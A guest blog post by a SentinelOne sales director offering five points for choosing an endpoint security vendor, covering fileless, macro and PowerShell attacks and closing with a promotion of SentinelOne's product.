If you can use help in assessing endpoint security suppliers, these are the five points that ensure you will be asking the right questions.
It is no news that cyber threat is increasing. The demand for effective security solutions has never been so high, as advanced hacking attacks continue to increase. The market is flooded with suppliers who make bold claims and come up with even more bold statements in news stories. It is even difficult for security professionals to distinguish fact from fiction. That is why I list the five most important points for you.
1. Viruses are not the only threat
Malware has evolved to much more than just an old-fashioned computer virus. However, most security solutions still have the term "anti-virus" in their name, which often says something about the ability of such solutions to deal with the modern threat.
The reality is that cyber attacks take many different forms that have nothing to do with a virus or even a file. They can vary from non-distinctive to very focused. These include ransomware, spear phishing, drive-by attacks and will use both software and hardware vulnerabilities that can lead to loss of customer and company data.
Do not fall into the trap of thinking that your company is too small to be a target. Attackers arm themselves with machine learning to perform highly targeted actions in a scalable way at low cost.
Do not forget that the threat can also come from within; dissatisfied employees know the weaknesses of your systems better than any outsider. Good endpoint security must be able to detect bad behavior regardless of the point of origin.
2. Malicious files are only part of the problem
Old-fashioned security software works by scanning files on a local computer to determine whether they are malicious or not. This involves looking at the reputation of the file's characteristics. Like the term 'anti-virus', this is a very outdated way of protection.
Such solutions have been extended over the years with additional features such as blocking malicious websites or detecting excessive use of resources, in order to combat newly introduced threats. Instead of such a reactive approach, truly effective protection will have to be proactive without strong reliance on reputation-based protection.
The vast majority of successful attacks are 'file-less' nowadays, an infection is set in motion without a file being involved. For example, such attacks change DNS settings to route your network traffic so that code is injected into everyday, routine processes. An outdated security solution that primarily focuses on scanning malicious files is far beyond the expiry date.
3. Confidence as a weak point in the system
Unreliable software is not the only danger for your endpoint. Even software from established brands is used to attack your system. Although MS Office attacks have a long history, macro attacks such as DDE can exploit vulnerabilities. Such attacks are overlooked by many security solutions because they seem to come from reliable applications. At the same time, most companies will need legitimate PowerShell operations, while PowerShell-based attacks are becoming more and more common.
You need a security solution that is smart enough to distinguish legitimate PowerShell activity from malicious behavior.
Modern malware can also run without being detected by traditional security solutions and by working with permissions at system level. This kind of malware is made of a vulnerability that allows abuse of powers or other infection methods. This is possible because many anti-virus solutions grant access on the basis of identity, instead of behavior. When security solutions keep using such a "whitelisting" approach, the endpoint remains vulnerable to supply chain attacks and false certificates.
4. The power of simplicity
Security software does not have to be difficult to use and you should not have to be a security expert to perform effective management. Unfortunately, many security software providers give the impression that the undoubtedly large complexity 'under the hood' should also lead to a very complex control environment.
Make sure you choose an endpoint solution that keeps maintenance tasks to a minimum, presents tasks in a clear and easy-to-understand interface and clicks on the button with the click of a button.
5. Security is a mindset, not a product
The biggest misconception you can have about security solutions is to believe that it solves all your security problems in one go. Threats can take various forms: from random ransomware attacks to dissatisfied employees. What is your action plan when (do not think "if") there is a threat? How do you respond? The lack of an action plan can lead to major damage to your customers, your data and your reputation.
That is why you need an endpoint solution that can be part of your complete action plan. A platform-independent solution such as SentinelOne provides 360-degree insight into the status of your endpoints, including the encrypted traffic within your network, restores a rollback after an attack with one click and uses a single, easy-to-use agent.
Eric van Sommeren is Director Sales Northern Europe for SentinelOne. He shares his passion for endpoint security software as a guest blogger for EASI.